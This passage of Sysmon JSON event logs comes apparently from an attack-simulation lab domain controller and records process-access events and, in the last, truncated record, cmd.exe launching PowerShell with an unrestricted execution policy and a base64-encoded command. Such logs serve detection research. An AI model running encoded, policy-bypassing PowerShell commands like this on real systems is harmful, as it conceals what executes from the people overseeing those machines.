C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5026,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","TargetProcessId":"4536","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5027,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.705\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.705","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010CCF40700}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5028,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.705\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.705","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010CCF40700}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5029,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 2552\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"2552","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010CCF40700}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5030,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5031,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5032,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5033,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.741\r\nProcessGuid: {41C8662E-20CF-5F25-0000-00108EF70700}\r\nProcessId: 4092\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIA